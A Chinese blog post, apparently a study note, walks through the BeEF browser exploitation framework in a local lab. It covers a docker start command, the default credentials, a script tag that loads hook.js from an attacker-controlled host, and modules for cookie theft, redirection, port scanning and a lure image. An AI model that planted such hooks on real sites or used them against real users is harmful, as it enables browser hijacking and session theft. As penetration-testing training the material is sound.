Beef-Xss 浏览器攻击框架的使用

已于 2023-11-07 09:40:33 修改
阅读量604 收藏 6
点赞数 1
分类专栏: 网络安全 Beef-Xss 文章标签: xss 网络安全
于 2023-10-01 18:41:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/133467196
版权

本文对Beef这款工具的具体功能操作,做一些介绍

Beef是什么呢?   它是一款用于渗透测试用的工具,它可以劫持受害者的浏览器,执行一些用户未执行的命令,也可以远程获取受害者的cookie等……

在kali系统里这款工具是自带的,直接在搜索框里搜索就可以;但有些版本是没有的

如果你的kali系统里没有自带的话可以用下面这行代码使用Beef,直接一条命令就搞定了,无需多余操作。

docker run --rm -p 3000:3000 janes/beef

当然,如果没有docker的话自行安装。某度上都有,很简单

输入命令后等待下载(这条命令第一次使用是下载beef,日后工具的启动,也可以用这条命令

输入这条命令启动这款工具,下面是什么都没有显示的,就像这张图一样可以用ctrl+c先结束掉程序,结束掉以后会出现一些东西,就像下面这张图

浏览器访问那个127.0.0.1:3000/ui/panel的地方,即可登录beef

http://172.17.0.2:3000/ui/panel

默认账号密码都是 beef beef

这个保存密码是浏览器的功能不是beef程序的要求随便选不重要,第一次登录的时候,看别人的文章以为是要我改密码来着。我们使用docker这个命令运行的beef不用去改什么密码,直接照样用,没有事儿

登录上去的样子 。如下图:

我随便找了个本地的靶场,在这个靶场里面链接了那个hook.js文件;打开开发者工具查看数据包,看见成功引用了hook.js文件,说明已经中招。

<script src="http://your IP:your port/hook.js"></script>

我们这时候就可以去beef的控制盘里看看情况了,在这一栏里出现了我物理机的IP地址,表示这就是你可以操作的目标了。如下图:

来到Commands选项卡里面的,我们可以做一些具体操作,比如这个Redirect Browser里的重定向功能     如下图:

可以用Get Cookie的功能,获取受害者当前站点的Cookie。如下图:

你点击一次命令执行,这边就会出现一个结果,点击两次,就会出现两个,第二个里面就是你第二次命令执行的结果。如下图

 在这个功能里面,可以对目标进行端口扫描,扫描需要一些时间,等待一会即可。如下图:

在这个功能里面我们可以指定用户的浏览器界面上出现一个我们自定义的图片出来,这个图片可以点击,如果用户点击了则会跳转到我们指定的网站上去。如下图:

受害者原本的模样。如下图:

​​​​​​​​​​

命令执行后受害者的浏览器,这个图片可点击,点击后会跳转网站。如下图:

由于那个默认跳转的地址是一个下载的文件,所以是这个样子。如下图

工具的利用就说到这了,感谢观看,记一次学习笔记

梧六柒
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(31)BeEF-XSS一款红队XSS神器
午夜安全
09-25 1860
我们知道XSS漏洞分为存储型、反射型、DOM型,最常见的就是利用XSS漏洞弹窗,进一步获取用户Cookie信息。可是如今的WEB系统,有的已经设置HttpOnly属性,有的在请求头中使用Authorization字段提供token令牌,这导致了我们难以获取到用户的身份信息。在这个背景下,XSS漏洞好像越来越没用了。BeEF-XSS是一款非常强大的XSS平台,集成了许多payload,利用它可以极大的提高XSS漏洞的威力。
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1058
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
kali,beef-xss安装使用
m0_73581247的博客
06-22 1730
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
xss跨站漏洞】xss漏洞利用工具beef安装
2302_79590880的博客
02-22 760
xss工具beef的服务器安装
beef-xss浏览器劫持
weixin_43225966的博客
04-19 788
beef-xss浏览器劫持复现
beef-xss安装使用
Bu2n的博客
12-07 3330
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
本地搭建beef_xss映射到公网
qq_41671415的博客
02-20 1528
前言:原本很简单的docker安装beef就完事l,结果垃圾阿里yum源居然不能构建缓存,网上的在线xss风险高的一批不敢用, 环境: 服务端:阿里云(centos8),frps 客户端:win 10 , frpc frp安装配置so easy,百度一大堆 docker安装beef so easy,百度一大堆 访问成功: 在这里插入图片描述 ...
存储型XSSBEEF浏览器攻击框架
分享学习网络的点点滴滴
08-24 371
里面有很多,比如获取cookie,获取超链接啊,修改超链接啊,开启摄像头啊,攻击啊,dos,交换机路由器漏洞利用啊等等,自己使用dvwa用kali试试吧;方法还是跟反射型方法一样,只不过对于存储XSS是存入数据库的,只要打开页面就会执行。客户端:运行于客户端浏览器的Javascript脚本(hook)红色模块:表示模块不适用于当前用户,有些红色模块也可被正常执行。绿色模块:表示模块适合目标浏览器,并且执行结果被客户端不可见。橙色模块:模块可用,但结果对用户可见(CAM弹窗申请权限等)
kali之beef使用_kali没有beef网络安全开发基础培训
最新发布
2301_76223496的博客
04-17 936
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接着访问有勾子的页面http://192.168.133.131:3000/demos/basic.html 这里的主机名和端口号要按照你设置的来修改, 这里要注意一下kali下beef版本的勾子不支持IE8,最新版或者旧一些的版本可以。④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
docker-beef:BeEF浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉 BeEFDockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
vasp.5.4.4&beef-src.tar.xz
03-20
beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT - Software...
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
在本课程中,我们将学习如何使用Beef与Metasploit框架协同工作,以实现对目标客户端的攻击。 首先,我们需要准备一个渗透测试环境,包括Kali Linux(作为渗透机)和多个Windows服务器及客户端。确保所有机器之间的...
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
Beef-xss是一个强大的XSS攻击框架,它提供了丰富的功能,能帮助攻击者远程控制受害者浏览器。 在Kali Linux系统中安装Beef-xss,你需要: 1. 更新Kali的软件源,将它切换至国内的中科大镜像源,使用`vim`编辑`/etc/...
Centos7 Docker安装Beef(阿里云服务器)
sinat_61654365的博客
01-15 987
2、映射到自己喜欢的端口,我就弄到2333吧。账号密码都是beef
工具----9、浏览器攻击框架--(BeEF
热门推荐
七天
01-28 1万+
一、BeEF简介 BeEF:Browser Exploitation Framework。是由ruby语言开发的一个专门攻击浏览器框架。 二、BeEF安装 Kali中默认是安装BeEF的,如果未安装,执行以下命令: apt-get update apt-get install beef-xss 修改beef密码: beef默认密码太弱,是无法直接登陆的,需要先修改一下密码,进入到相关路径cd /usr/share/beef-xss/进入config.yaml文件中修改密码,修改vim config.y
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1148
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
docker搭建xss平台
liguangyao213的博客
01-06 1432
下载xss_platform docker search xss xss平台没有统一的名称,只能按照xss关键词来进行搜索 定位到之后进行下载 docker pull wushangleon/xss_platform 启动docker,这里我用一个不常用的8001端口做映射 docker run -d --name=xss_platform -p 8001:80 wushangleon/xss_platform docker ps #查看已经启动 浏览器访问:http://ip:8001/ 配置
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1315
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
云服务器上搭建beef-xss
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如阿里云、腾讯云等,并创建一个适合你需求的云服务器实例。 2. 安装操作系统:在云服务器上安装一个支持beef-xss的操作系统,常见的选择是Linux发行版,如Ubuntu、CentOS等。 3. 安装依赖软件:在操作系统上安装必要的软件和工具,如Ruby、RubyGems、Node.js等。具体的安装步骤可以参考beef-xss的官方文档。 4. 下载beef-xss:从beef-xss的官方网站或GitHub仓库下载最新版本的beef-xss。 5. 配置beef-xss:根据你的需求,编辑beef-xss的配置文件,设置监听IP地址、端口号等参数。 6. 启动beef-xss:运行beef-xss的启动命令,启动beef-xss服务。 7. 配置防火墙和网络:确保云服务器的防火墙和网络设置允许外部访问beef-xss服务。 8. 测试和使用使用Web浏览器访问云服务器的IP地址和端口号,进入beef-xss的管理界面,开始进行漏洞测试和XSS攻击。 请注意,在进行任何安全测试和攻击活动之前,确保你已经获得了合法的授权,并且遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值